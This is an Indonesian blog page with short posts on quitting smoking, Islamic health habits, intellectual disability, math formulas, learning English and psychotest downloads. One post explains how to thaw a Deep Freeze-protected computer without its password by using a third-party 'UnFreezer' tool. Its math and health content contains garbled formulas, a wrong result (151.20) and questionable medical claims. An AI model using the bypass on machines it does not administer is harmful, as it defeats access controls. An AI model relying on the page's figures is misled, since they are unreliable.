Anda pernah mendengar istilah “cold turkey”? lstilah tersebut digunakan bagi perokok yang berhenti merokok secara total dan langsung (tidak bertahap). Mungkin cara ini terdengar menarik, Anda tinggal membuang seluruh rokok Anda dan mendeklarasikan bahwa Anda sudah berhenti merokok. Mudah bukan? Jangan salah, teknik “cold turkey”belum tentu berhasil untuk semua orang, karena hal tersebut tidaklah mudah untuk dilakukan. Di antara mereka yang berusaha berhenti merokok tanpa bantuan terapi atau pengobatan, sebanyak 95% akhirnya kambuh lagi untuk merokok. Ingat, merokok adalah suatu adiksi (kecanduan). Otak seorang perokok membutuhkan nikotin lebih dan lebih lagi agar dapat berkonsentrasi dengan baik. Ketika tidak ada asupan nikotin dari rokok (karena perokok berhenti mendadak), gejala putus nikotin bisa terjadi, dan dibutuhkan kesabaran dan motivasi yang sangat kuat untuk melawannya.

3. Berkonsultasilah dengan dokter Anda mengenai terapi berhenti merokok
Di pasaran memang terdapat beberapa produk untuk membantu mereka yang ingin berhenti. Namun, produk-produk seperti permen karet atau nicotine patch ini tidak selamanya efektif membantu Anda berhenti merokok, karena produk ini pada esensinya hanya menjadi sumber nikotin lain untuk tubuh Anda (tidak mengurangi atau menghentikan kecanduan nikotin). Saat ini telah tersedia obat yang terbukti efektif untuk membantu berhenti merokok. Cara kerjanya adalah dengan menduduki reseptor nikotin di otak, sehingga ketika Anda merokok, nikotin yang masuk tidak lagi memberikan rasa nikmat, dan pada akhirnya mengurangi minat Anda untuk merokok. Selain itu obat ini juga membantu mengurangi gejala putus nikotin, seperti depresi dan sulit berkonsentrasi. Untuk mengetahui Iebih lanjut tentang terapi berhenti merokok termasuk penggunaan obat, berkonsultasilah dengan dokter Anda. Ingat, obat ini termasuk obat keras, jadi jangan gunakan obat ini tanpa pengawasan dokter.

4. Jangan lakukan perjuangan ini sendirian
perokok yang memiliki semangat pun merasakan susahnya berhenti merokok tanpa dukungan dari sekitarnya. Untuk berhenti merokok memang bukan suatu hal yang mudah, dan dukungan dan keluarga, teman, rekan kerja, dan lingkungan pergaulan lainnya menjadi faktor yang turut berperan penting dalam mensukseskan usaha ini. Beritahukan kepada teman, keluarga, dan rekan kerja Anda tentang niat Anda untuk berhenti. Dukungan mereka akan sangat membantu Anda meraih kesuksesan dalam perjuangan Anda berhenti merokok.
Anda juga bisa ikut bergabung dalam support group atau berkonsultasi dengan konselor. Terapi perilaku adalah jenis konseling yang membantu Anda mengidentifikasi dan melaksanakan strategi yang bisa Anda terapkan untuk berhenti merokok. Gabungkan terapi perilaku ini dengan terapi pengobatan lainnya untuk meningkatkan kemungkinan Anda untuk sukses.

5. Hadapi stress dengan bijak
Salah satu alasan orang merokok adalah karena nikotin membuat mereka merasa nyaman dan rileks. Ketika Anda berhenti merokok, Anda membutuhkan cara lain untuk mengatasi stress. Tak ada salahnya Anda mencoba ke spa untuk mendapatkan pijit terapi / relaksasi, mendengarkan lagu yang menenangkan, atau mempelajari yoga. Sebisa mungkin, hindari situasi yang membuat Anda stress selama minggu-minggu pertama Anda berhenti merokok.

6. Hindari kebiasaan yang mendorong Anda untuk merokok
Beberapa aktivitas tertentu dapat memicu keinginan Anda untuk merokok. Misalnya, kebiasaan minum kopi di pagi hari sambil merokok. Jika Anda terbiasa melakukannya, cobalah mengganti kopi dengan teh selama beberapa minggu.
jika Anda terbiasa merokok setelah makan, cobalah mencari kegiatan lain untuk dilakukan setelah makan, misalnya menyikat gigi atau mengunyah permen karet bebas gula.

7. Bersihkan rumah Anda
Buanglah semua atribut rokok seperti bungkus rokok, asbak, dan korek api I lighter Anda. Cuci semua baju I pakaian yang berbau rokok, dan bersihkan karpet, gorden, dan perabotan lain yang dibuat dari kain yang dapat menyerap bau rokok. Gunakan pengharum dan penyegar ruangan untuk membantu Anda menghilangkan bau rokok di rumah Anda, sebab bau rokok akan merangsang Anda untuk kembali merokok.

8. Coba dan coba lagi
Berhenti merokok memang bukan perjuangan yang mudah. Tak jarang akhirnya perokok yang berusaha berhenti merokok akan kambuh lagi. Beberapa perokok juga harus mencoba berhenti beberapa kali sebelum akhirnya bisa lepas total dan rokok. Cobalah untuk menganalisa situasi dan suasana hati yang dapat memicu Anda untuk kembali merokok. Pakailah kondisi tersebut sebagai suatu kesempatan untuk menguatkan kembali komitmen Anda untuk berhenti. Begitu Anda memutuskan untuk mencoba lagi, tetapkan tanggal berhenti Anda dalam 1 bulan ke depan.

9. Ayo berolahraga!
Aktivitas fisik dapat mengurangi ketagihan terhadap rokok dan membantu Anda mengatasi gejala putus nikotin. Ketika Anda merasa ingin merokok, segera alihkan energi Anda untuk berlari, berjalan cepat, bersepeda, atau bersepatu roda. Tak perlu olahraga yang berat, cukup yang intensitasnya sedang saja, misalnya mengajak hewan peliharaan Anda berkeliling lingkungan atau mencabut rumput liar di halaman rumah Anda. Kalori ekstra yang Anda bakar juga akan membantu mencegah terjadinya kenaikan berat badan yang mungkin terjadi saat Anda berhenti merokok.

10. Perbanyak konsumsi buah dan sayur
Jangan mencoba untuk berdiet ketika Anda berhenti merokok — terlalu banyak larangan I batasan bisa berbalik merugikan rencana awal Anda. Sebaliknya, perbanyaklah konsumsi buah, sayur, dan produk susu rendah lemak. Sebuah penelitian yang dilaksanakan oleh Duke University mengimplikasikan bahwa makanan-makanan ini membuat rasa rokok menjadi tidak enak. Hal ini akan membantu Anda melawan ketagihan sekaligus memberikan nutrisi yang dibutuhkan untuk melawan penyakit.

11. Pilih Hadiah Anda
Selain memberikan manfaat kesehatan yang besar, salah satu keuntungan dari berhenti merokok adalah Anda bisa menabung uang yang biasanya digunakan untuk membeli rokok. Hadiahi diri Anda dengan membeli sesuatu yang Anda sukai dari sebagian uang yang Anda tabung tersebut.

12. Lakukan ini demi kesehatan Anda
Dalam waktu singkat saja, berhenti merokok Iangsung memberikan manfaat kesehatan bagi Anda. Tekanan darah dan denyut jantung Anda akan turun dalam waktu 20 menit setelah Anda berhenti merokok. Dalam waktu 1 hari, kadar oksigen dan karbon monoksida dalam darah Anda akan kembali normal, dan risiko penyakit jantung berkurang. Manfaat jangka panjang yang bisa Anda dapatkan meliputi penurunan risiko penyakit jantung koroner, stroke, kanker paru-paru, dan kanker lainnya. Wallahua’lam…

sumber : infopendidikankita.blogspot.com/2010/07/menghentikan-aneka-kecanduan.html

Baca Selengkapnya ....

Sehat Ala Kehidupan Rasulullah SAW

Posted by Lowongan Kerja Cpns Terbaru 0 comments
Informasi buat kita semua bagaimana Rasulullah dan umat Islam 14 abad yang lalu sehat. Rasulullah bersabda: “Mu’min yang kuat adalah lebih baik dan lebih dicintai Allah daripada mu’min yang lemah…”(HR Muslim).

Bagaimana agar senantiasa sehat seperti Rasulullah? Ikuti resep berikut:

SELALU BANGUN SEBELUM SHUBUH. 
Rasul selalu mengajak ummatnya untuk bangun sebelum shubuh, melaksanakan shalat sunah dan shalat Fardhu, shalat shubuh berjamaah. Hal ini memberi hikmah antara lain :
* Berlimpah pahala dari Allah.
* Kesegaran udara shubuh yang bagus untuk kesehatan misalnya untuk terapi penyakit TBC.
* Memperkuat pikiran dan menyehatkan perasaan.

AKTIF MENJAGA KEBERSIHAN. 
Rasul selalu senantiasa rapi & bersih, tiap hari kamis atau Jumát beliau mencuci rambut-rambut halus di pipi, selalu memotong kuku, bersisir dan berminyak wangi.
“Mandi pada hari Jumát adalah wajib bagi setiap orang2 dewasa. Demikian pula menggosok gigi dan memakai harum-haruman” (HR Muslim)

TIDAK PERNAH BANYAK MAKAN.
Sabda Rasul: “Kami adalah sebuah kaum yang tidak makan sebelum lapar dan bila kami makan tidak terlalu banyak (tidak sampai kekenyangan) “(Muttafaq Alaih)
Dalam tubuh manusia ada 3 ruang untuk 3 benda : Sepertiga untuk udara, sepertiga untuk air dan sepertiga lainnya untuk makanan. Bahkan ada satu tarbiyyah (pembelajaran) khusus bagi ummat Islam dengan adanya Puasa Ramadhan untuk menyeimbangkan kesehatan.

GEMAR BERJALAN KAKI.
Rasul selalu berjalan kaki ke Masjid, Pasar, medan jihad, mengunjungi rumah sahabat, dan sebagainya. Dengan berjalan kaki, keringat akan mengalir, pori-pori terbuka dan peredaran darah akan berjalan lancar. Ini penting untuk mencegah penyakit jantung.
TIDAK PEMARAH.
Nasihat Rasulullah: “Jangan Marah” diulangi sampai 3 kali. Ini menunjukkan hakikat kesehatan dan kekuatan Muslim bukanlah terletak pada jasadiyah belaka, tetapi lebih jauh yaitu dilandasi oleh kebersihan dan kesehatan jiwa. Ada terapi yang tepat untuk menahan marah:
* Mengubah posisi ketika marah, bila berdiri maka duduk, dan bila duduk maka berbaring.
* Membaca Ta ‘awwudz (a’udzubillahimina asy-syaithonirrajiim), karena marah itu dari Syaithan.
* Segeralah berwudhu.
* Shalat 2 Rakaat untuk meraih ketenangan dan menghilangkan kegundahan Hati.
OPTIMIS DAN TIDAK PUTUS ASA.
Sikap optimis akan memberikan dampak psikologis yang mendalam bagi kelapangan jiwa sehingga tetap sabar, istiqamah dan bekerja keras, serta tawakal kepada Allah SWT.
TAK PERNAH IRI HATI. 
Untuk menjaga stabilitas hati & kesehatan jiwa dan mentalitas maka menjauhi iri hati merupakan tindakan preventif yang sangat tepat. Kecuali untuk iri kepada 2 hal:
* Iri kepada orang yang memiliki harta yang melimpah tapi tidak segan untuk menafkahkan hartanya dijalan kebaikan.
* Iri kepada orang yang memiliki ilmu pengetahuan yang luas tapi tidak sungkan untuk mengajarkannya kepada orang lain siapa pun tanpa pilih kasih
Semoga Bermanfaat :D

Sumber : Cahaya Timur

Baca Selengkapnya ....

Sebab orang jadi Idiot

Posted by Lowongan Kerja Cpns Terbaru 0 comments
Istilah idiot sebenarnya sudah tidak dipakai di dunia medis untuk menyebut anak-anak yang memiliki kelambanan menangkap respons baik secara motorik, kognitif, sosial dan bahasa. Apa yang menjadi penyebab keterbelakangan mental atau retardasi mental itu?



Meski intelligence quotient (IQ) bukan satu-satunya cara untuk mengukur anak ‘idiot’ tapi kebanyakan anak dengan kondisi itu memiliki tingkat kecerdasan di bawah normal.

Standar IQ yang normal menurut skala Stanford-Binet adalah di kisaran 85-115. Hanya 1 persen saja populasi di dunia yang memiliki tingkat IQ di atas 135. Separuh (50%) populasi di dunia memiliki IQ rata-rata di kisaran 90-110, sebesar 25% memiliki IQ di atas rata-rata itu dan 25% populasi di dunia memiliki IQ di bawahnya.

Orang yang ber-IQ rendah di bawah 70 dan sulit berkomunikasi dengan orang lain yang biasanya disebut ‘idiot’ atau keterbelakangan mental. Orang-orang seperti ini memiliki kepribadian yang unik namun dalam kehidupan sosial sering menjadi olok-olokan di masyarakat.
Seperti dilansir dari keepkidshealthy, Selasa (16/3/2010), ‘idiot’ diklasifikasikan menurut besarnya IQ, yaitu:

1. Ringan
Nilai IQ antara 55-69. Sekitar 85 persen anak ‘idiot’ berada di kisaran ini, dan tergolong yang berpendidikan. Anak-anak tersebut dapat belajar membaca dan menulis hingga kelas 4 atau 5. Mereka relatif hidup mandiri dan bisa bekerja dengan pelatihan khusus.
2. Sedang
Nilai IQ antara 40-54. Sekitar 10 persen anak ‘idiot’ masuk klasifikasi ini, juga tergolong yang dapat dilatih. Anak-anak ini mungkin memiliki potensi akademik di TK atau kelas 1. Memiliki kemampuan terbatas untuk membaca dan biasanya membutuhkan dukungan dan pengawasan sehari-hari dalam kegiatan hidup, dan bisa bekerja dengan pelatihan khusus.
3. Parah
Nilai IQ antara 25-39. Sekitar 5 persen anak ‘idiot’ masuk klasifikasi ini. Anak-anak dengan tingkat ini tampaknya tidak akan mampu belajar membaca dan menulis, tetapi mungkin bisa ke toilet sendiri dengan dilatih dan berpakaian dengan dibantu. Mereka biasanya membutuhkan pengawasan dan dukungan total untuk kegiatan kehidupan sehari-hari.
4. Mendalam
Nilai IQ di bawah 24, dan kurang dari 1 persen anak ‘idiot’ yang berada di klasifikasi ini.
Namun sebuah sistem klasifikasi lebih baru dikembangkan pada tahun 1992 yang tidak didasarkan pada nilai IQ. Pengelompokkan anak keterbelakangan mental didasarkan pada jumlah dukungan dan pengawasan terhadap kebutuhan individu yaitu intermittent, limited, extensive dan pervasive.

Ada banyak hal yang menjadi pemicu anak mengalami ‘idiot’. Biasanya dikelompokkan menjadi:
1. Prenatal (sebelum lahir)
Disebabkan oleh:
- Kelainan kromosom, termasuk sindrom Fragile X
- Cacat gen
- Terkena racun atau infeksi selama kehamilan
2. Perinatal
Disebabkan oleh:
- Lahir prematur
- Komplikasi infeksi
3. Postnatal (setelah lahir)
Disebabkan oleh:
- Infeksi
- Keracunan
- Gangguan metabolisme
- Trauma kepala

Lebih dari setengah anak ‘idiot’ ringan tidak dapat diidentifikasi penyebabnya, tetapi ‘idiot’ berat jauh lebih mungkin ditemukan penyebabnya, dengan kemungkinan sekitar 75 persen. Tes untuk mengidentifikasikan penyebab ‘idiot’ tergantung pada kondisi di penderita.

Pengujian biasanya terbatas pada analisa kromosom untuk Down Sindrom atau sindrom Fragile X. Atau lebih dalam lagi dapat dilakukan pengujian dengan MRI otak. Pengujian akan meliputi tes psikologis untuk mengevaluasi tingkat IQ dan fungsinya.

Penyebab umum ‘idiot’, meliputi:
1. Down syndrome
Merupakan penyebab yang paling umum dari ‘idiot’ sedang hingga parah.
2. Fragile X syndrome
Ini merupakan penyebab paling umum dari ‘idiot’.
3. Rett syndrome
Sindrom ini hanya berpengaruh pada perempuan.

Gejala anak yang mengalami idiot dapat sangat bervariasi, tergantung pada penyebab dan beratnya. Secara umum, kebanyakan tanpa bukti fisik seperti bayi dengan Down sindrom yang diduga menderita ‘idiot’ ketika mereka tidak memenuhi tahap perkembangan sesuai dengan usianya. Beberapa anak dengan ‘idiot’ ringan tidak teridentifikasi sampai mereka mulai bersekolah.

Pengobatannya tergantung pada penyebab tetapi secara umum tidak ada obat untuk ‘idiot’. Perawatan hanya dimaksudkan untuk mengajarkan keterampilan yang diperlukan untuk memaksimalkan bagaimana mereka dapat mandiri.

Anak-anak yang mengalami keterbelakangan mental mungkin memiliki kondisi lainnya juga seperti autisme, ADHD (Attention-Deficit Hyperactivity Disorder), gangguan kecemasan, depresi, obcessive compulsive disorder, cerebral palsy, epilepsi, hyrocephalus, dan spina bifida, dan masalah tingkah laku. Jika ada, kondisi-kondisi tersebut harus ditanggapi secara baik.

Masa-masa mengandung ibu hamil dan konsumsi makanan bergizi bisa mencegah lahirnya anak keterbelakangan mental. Anak-anak dalam kondisi seperti ini banyak yang bisa melewati hidupnya dengan baik karena memiliki keterampilan yang cukup yang bisa didapat dari sekolah-sekolah khusus.

Sumber : Detik.com

Baca Selengkapnya ....

Download Kumpulan Rumus MTK

Posted by Lowongan Kerja Cpns Terbaru 0 comments
pelajaran matematika sebenarnya paling gampang jika kita memang mau belajar dan memahami, namun saya sendiri sebetulnya tidak begiu mendalami pelajaran matematika sma tersebut, jadi disini hanya sekedar sharing beberapa kumpulan rumus pelajaran matematika ini, jadi jangan dianggap saya benar – benar memahami rumus matematika ini yah..

berikut link untuk Download Kumpulan Rumus Matematika sma

1. Download Rumus Logaritma
2. Download Rumus Program Linear
3. Download Rumus Turunan
4. Download Rumus Statistika
5. Download Rumus Vektor
6. Download Rumus Matriks
7. Download Rumus Persamaan Kuadrat
8. Download Rumus Suku Banyak
9. Download Rumus Limit Fungsi
10. Download Rumus Transformasi
11. Download Rumus Trigonometri
12. Download Rumus Eksponen
13. Download Rumus Peluang
14. Download Rumus Integral
15. Download Rumus Logika Matematika
16. Download Rumus Fungsi Kuadrat
17. Download Rumus Dimensi Tiga
18. Download Rumus Lingkaran
19. Download Rumus Barisan dan Deret
20. Download Rumus Pertidaksamaan
21. Download Rumus Fungsi Komposisi dan Fungsi Invers
22. Rumus Rubik 3×3
23. Rumus Rubik 2×2
nah itulah beberapa kumpulan Rumus Matematika SMA yang saya sharing disini dan semoga bisa bermanfaat dalam memahami pelajaran matematika dengan serius.

Baca Selengkapnya ....

Pentingnya belajar Bahasa Inggris

Posted by Lowongan Kerja Cpns Terbaru Wednesday, February 2, 2011 0 comments
Penguasaan bahasa Inggris saat ini semakin terasa mendesak dan sangat perlu, mengingat bahasa Inggris merupakan salah satu bahasa internasional yang sangat lazim digunakan dalam pergaulan internasional di bidang ekonomi, perdagangan, ilmu pengetahuan, teknologi dan informasi.
Sebagai contoh, tidak jarang saya temukan temen-temen yang belajar tentang ilmu komputer (program, design, multimedia dsb) atau ilmu pariwisata menemukan kesulitan dalam proses pembelajaran dan pemanfaatannya karena mereka malas membaca petunjuk yang telah ditulis dalam bahasa Inggris oleh developernya atau buku-buku penunjang yang berbahasa inggris. Malas itu muncul karena kurangnya penguasaan akan bahasa Inggris.
Ironisnya, kita (ini buat yang ngaku ga tau ya) telah diajarkan bahasa Inggris semenjak SMP atau bahkan SD tapi sampai tamat kuliah pun kita tetap merasa tidak mengerti bahasa Inggris. Mungkinkah guru-guru kita dulu yang salah? Tentu tidak. Truss…Ya, salahnya terletak pada diri kita sendiri. Inilah kira-kira penyebab orang tidak bisa berbahasa Inggris:
  • Ada siswa menganggap bahasa Inggris sebagai monster. Jadi ketika pelajaran bahasa Inggris akan dimulai, mereka biasanya nongkrong di kantin atau di jalanan.
  • Tidak tahu fungsi bahasa Inggris. Karena tidak tahu untuk apa nantinya bahasa Inggris digunakan, ya mereka cuek bebek aja.
  • Tidak terpikat oleh bahasa Inggris. Biasanya, orang-orang yang dari kecilnya uda seneng menghafal dan menyanyikan lagu-lagu barat berbahasa Inggris akan merasa tertarik untuk mempelajari bahasa Inggris.
  • Terlalu menilai bahasa Inggris itu susah. Apapun yang belum kita pelajari pasti kita anggap susah. Jadi, jangan takut untuk mempelajarinya. Kalau sudah jalan, pasti sedikit demi sedikit akan terasa semakin gampang.
  • Buku-buku pelajaran bahasa Inggris umumnya menggunakan kalimat-kalimat yang terlalu baku dalam menjelaskan. Coba ada buku bahasa Inggris yang menggunakan kalimat-kalimat gaul dengan gaya bahasa anak muda (atau kalo perlu menggunakan huruf besar kecil kayak di sms hehehe) dalam menjelaskan materi, interaktif, komunikatif dan menimbulkan daya tarik untuk dipelajari, saya jamin semua anak Indonesia bakalan fasih berbahasa Inggris.
Berdasarkan hasil surfing selama ini, saya menyimpulkan kalau orang-orang Indonesia lebih tertarik membaca blog atau postingan di forum-forum dalam mempelajari bahasa Inggris. Padahal mereka uda punya buku-buku tentang grammar dan tenses loh dirumahnya. Loh kok?

Baca Selengkapnya ....

Penguasaan kosa kata 9 Vocab ) dalam bahasa Inggris

Posted by Lowongan Kerja Cpns Terbaru 0 comments
Penguasaan kosa kata atau lebih dikenal dengan istilah "vocabulary" menjadi sebuah keharusan bagi seseorang yang ingin memahami suatu bacaan, percakapan atau tulisan berbahasa Inggris. Tanpa kosakata yang cukup, mustahil bagi kita untuk dapat mencapai tujuan tersebut.

Sebuah pertanyaan klasik: "Bagaimana sih biar bisa berbahasa Inggris dengan baik dan lancar?". Jawaban dari pertanyaan tersebut sangat beragam. Ada 3 hal yang perlu diperhatikan benar-benar bagi para English Learner:

  • Harus ada kemauan. Dimana ada kemauan disitu ada jalan. Orang yang tidak mempunyai kemauan yang kuat, mustahil ia bisa menguasainya. Kesulitan yang dijumpai kalo ada kemauan pasti dapat terselesaikan.
  • Jumlah vocabulary (kosa kata) yang cukup. Kosa kata dapat ditambah dengan membaca kamus, bacaan berbahasa Inggris ataupun hasil diskusi dengan teman anda.
  • Penggunaan kosa kata yang diperoleh pada setiap kesempatan berbicara, berpidato atau komunikasi lainnya yang menggunakan Bahasa Inggris. Inilah hal yang paling sering dilupakan oleh orang yang belajar bahasa Inggris. Walaupun jumlah kosa kata yang dimiliki banyak pada suatu waktu, namun jika tidak digunakan/dipraktekkan maka akan lupa beberapa saat kemudian. Oleh karena itu, gunakanlah kosa kata yang sudah dimiliki di berbagai kesempatan.

Baca Selengkapnya ....

Membuka Komputer yang terProteksi DeepFreeze

Posted by Lowongan Kerja Cpns Terbaru 0 comments

Ini kejadian yang aku alami waktu menjadi admin. Untuk melindungi komputer dari tangan-tangan jahil, agar settingnya tidak berubah akhirnya saya kunci semua komputer dg program “Deep Freeze” (cukup membantu memang). Pada suatu waktu saya mau menginstall software baru, tapi….. saya lupa password untuk membuka program “Deep Freeze” tersebut, mau install semua komputer dari awal kelamaan. Akhirnya dapat pemecahannya untuk membuka program tersebut tanpa perlu tau passwordnya.

Caranya sbb :

  1. Download dulu software “unfreezer” untuk membobol program “DeepFreeze” di http://newsoftwarelist.com/utilities/deep-freeze-unfreezer/
  2. Terus jalankan program “UnFreezer”, program tersebut akan mendeteksi dg otomatis apakah ada program “DeepFreeze” apa tidak
  3. Lalu tinggal pilih anda mau membuka proteksi komputer tersebut dg memilih “Thawed” ato tidak.
  4. Klo udah restart komputernya (udah kebuka DeepFreeze nya… :D )

Semoga pengalaman ini bisa membantu teman2 yang komputernya terDeepFreeze. Memalukan …!!? masak admin sampe upa passwordnya :)

note : Jangan d gunakan untuk berbuat jahil ya ….. !!!


Baca Selengkapnya ....

Membedakan Permutasi dan Kombinasi

Posted by Lowongan Kerja Cpns Terbaru 0 comments
A. Notasi Faktorial

     Notasi Faktorial adalah perkalian bilangan dengan bilangan berurutan dari bilangan n, terus mengecil sampai bilangan satu.
n! = nx (n – 1) x ( n – 2 ) x ….x 3 x 2 x1
Contoh :
1.  5! = 5 x 4 x 3 x 2 x 1
2.  3! = 3 x 2 x 1

B. Permutasi

Permutasi adalah penyusunan unsur – unsur ( yang diambil dari sekelompok unsur ) dengan memperhatikan urutannya.
Contoh :
ABC ≠ BCA karena urutannya berbeda.

a. Permutasi yang Tiap Unsurnya Berbeda

Permutasi dengan kelompok unsure yang berbeda dapat dirumuskan sebagai berikut:
rPn = r!
r-n!

Ket:
r = sekelompok unsur yang tersedia
n = unsur yang dimbil
Dengan catatan, kelmpok unsur yang tersedia tidak ada yang sama.

Contoh:
Banyaknya bilangan yang terdiri atas 3 angka yag disusun dari angka – angka 1, 2, 4,6, 7, 9, sebagai berikut  :

6 angka 5 angka 4 angka
Angka    I                              II                          III

Jumlah angka keseluruhan adalah 6 angka, sehingga kemungkinan angka I adalah semua angka. Dilanjutkan angka II adalah 5 dan angka III adalah 4 angka karena urutan.

Jadi, banyaknya bilangan 3 sebagai beikut :
6 x 5 x 4= 120
Dapat dilambangkan  6P3 =  6!
(6-3 )!
= 6!
3!
= 6 x 5 x 4 x 3 x 2 x 1
3 x 2 x 1
= 120

b. Permutasi Yang Memuat Beberapa Unsur Sama

Permutasi yang memuat beberapa unsure yang sama dalam satu kelompok dapat dirumuskan sebagai berikut :

n P(a,b,c) =   n!
a!b!c!

Ket:
n= unsur yang tersedia
a , b , c = ( jumlah ) unsur-unsur yang sama
Contoh :
Tentukan banyaknya nama yang dapat dibentuk dari huruf M,A,T,E,M,A,T,I,K,A.
Penyelesaian:
-   Huruf yang tersedia 10
-   Unsur sma, 2 unsur ( huruf M) , 3 unsur (huruf A), 2 unsur (huruf T)
-   Dirumuskan 10P(2, 3, 2)= 10!/ 2!3!2!

= 10x9x8x7x6x5x4x3x2x1
(2×1) (3x2x1)  (2×1)
= 10 x 9 x 8 x 7 x 6 x 5
= 151.20

c. Permutasi Siklik
Permutasi siklik adalah permutasi yang memuat beberapa unsur yang urutannya berupa lingkaran tertutup.
Prmutasi siklik dapat dirumuskan sebagai beikut :

P(siklik) = (n-1)!

C. Notasi Kombinasi

Notasi kombinasi adalah pengelompokan suatu unsur dari kelompoknya dengan pilihan dari unsur yang tersedia tanpa memperhatikan urutannya. Notasi kombinasi dapat dirumuskan sebagai berikut:

n C r =    n1 r!( n-r)!
Ket:    n= unsur yang tersedia
r= unsur yang dipilih

Contoh:
Terdapat 10 bola yang terdiri dari 3 bola merah, 4 bola putih, dan 3 bola hijau .Berapa banyak kombinasi jika dilakukan pemilihan 2 bola.
Penyelesaian:
10C2=    10!           =  10x9x8x…x2×1 =45
2!(10-2)!                  2×1(8!)

Jadi, jumlah kombinasi warna jika diambil 2 bola = 45 warna.

D. Kejadian Sederhana , Ruang Contoh , Peluang , dan Kisaran nilai Peluang

a. Ruang Contoh
Ruang contoh adalah himpunan semua hasil yang mungkin pada percobaan.

Contoh:
Ruang contoh pelemparan dadu { 1,2,3,4,5,6}.Dan pelemparan uang {gambar, angka}.

b. Peluang
Adapun rumus dari peluang adalah:

P(A)=   n(A) n(S)
Ket:
n(A)=banyaknya hasil yang akan terjadi.
n(S) = banyaknya semua kemungkinan.

Contoh:
Dadu yang dilempar, kemungkinan keluar angka-angka genap dan kemungkinan  keluar angka 0 sebagai beikut:
1.     Angka genap
2,4,6= 3 kejadian
Kemungkinan angka mata dadu (ruang sampel) adalah:
1,2,3,4,5,6= 6 kemungkinan
Jadi, peluang genap =  3 =  1
6      2
2.     Angka nol
Sisi dadu tidak ada yang berangka 0
Maka, mustahil keluar angka 0
Jadi, peluang keluar 0= 0

c. Frekuensi Harapan
Frekuensi harapan dapat dirumuskan sebagai berikut:
Frekuensi harapan = P(A) x N Ket:
P(A)= peluang kejadian (A)
N= banyak percobaan


Contoh:
Jika sebuah dadu dilempar sebanyak 100 kali.
Berapa frekuensi munculnya bilangan prima sebagai berikut:
-   Mata dadu= 1,2,3,4,5,6
-   Bilangan prima pada dadu= 2,3,5
-   Peluangnya=      3
6
-         Frekuensi harapan = 3  x 100= 50 kali.
6

E. Kejadian Majemuk

a.     Peluang komplemen

P(A)= peluang kejadin munculnya A
P(A)=peluang kejadian munculnya bukan A

Maka , P(A) dan P(A’) adalah peluang kejadian yang salig komplemen.
P(A u A’)=1
Contoh:

Peluang munculnya bilangan bukan 5 pada pelemparan dadu sebagai berikut:
P(5)= 1/6 , maka komplemennya adalah munculnya bukan 5 { P(5’)}=1-1= 5/6
6

b. Peluang Gabungan Duan Kejadian Yang Saling Lepas
Peluang gabungan dua kejadian yang saling lepas adalah peluang kejadian yang tidak dapat berlangsung bersamaan.

Contoh :
Tentukan peluang munculnya bilangan 2 atau 4 dan peluang munculnya bilangan 5 pada pelemparan dadu.

Penyelesaian :
P(2,4)= 2/6
P(5)    = 1/6
= 2/6+1/6=1/2
Jadi, peluang 2 atau 4 atau 5 adalah ½.

F. Peluang Kejadian yang Saling Bebas

Peluang kejadian yang saling bebas adalah peluang muncul tidaknya kejadian A tidak terpengaruhi oleh muncul tidaknya kejadian B.

Contoh:
Pada pelemparan dadu dan uang logam , peluang munculnya bilangan prima dan gambar adalah saling bebas dengan peluang sebagai berikut:

P(prima)= P(2,3,5)=3/6=1/2
P(gambar)= P(G)= 1/2
P(prima dan gambar)= P(prima)x P(G)= 1/4.

Baca Selengkapnya ....

Tes Psikotes: Kumpulan Soal Materi PSIKOTEST untuk download gratis

Posted by Lowongan Kerja Cpns Terbaru Tuesday, February 1, 2011 1 comments

silakan download gratis, karena saya dapatnya juga gratis di link berikut ini:


  1. Tips RAHASIA lulus tes Psikotest, di sini linknya
  2. Tes menggambar, di sini link tes menggambar
  3. Tes padanan hubungan, klik test padanan hubungan
  4. Tes Logika angka,
  5. Modul Logika Aritmatika
  6. test aritmatika
  7. Logika
  8. WARTEGG TEST
  9. TES VERBAL
  10. TES READING
  11. TES SERI

Baca Selengkapnya ....

Download Soal Psikotes Gratis Versi PDF

Posted by Lowongan Kerja Cpns Terbaru 2 comments
Cara mendownloadnya:
1. Klik soal psikotest yang Anda iginkan.
2. Anda akan masuk ke situs Ziddu. Klik tombol Download.
3. Masukkan Verification Code yang muncul (harus benar).
4. Klik tombol download.
5. Save di komputer atau flasdisk Anda.

Download gratis soal psikotest



Semoga bermanfaat bagi Anda yang membutuhkan soal psikotest.

Baca Selengkapnya ....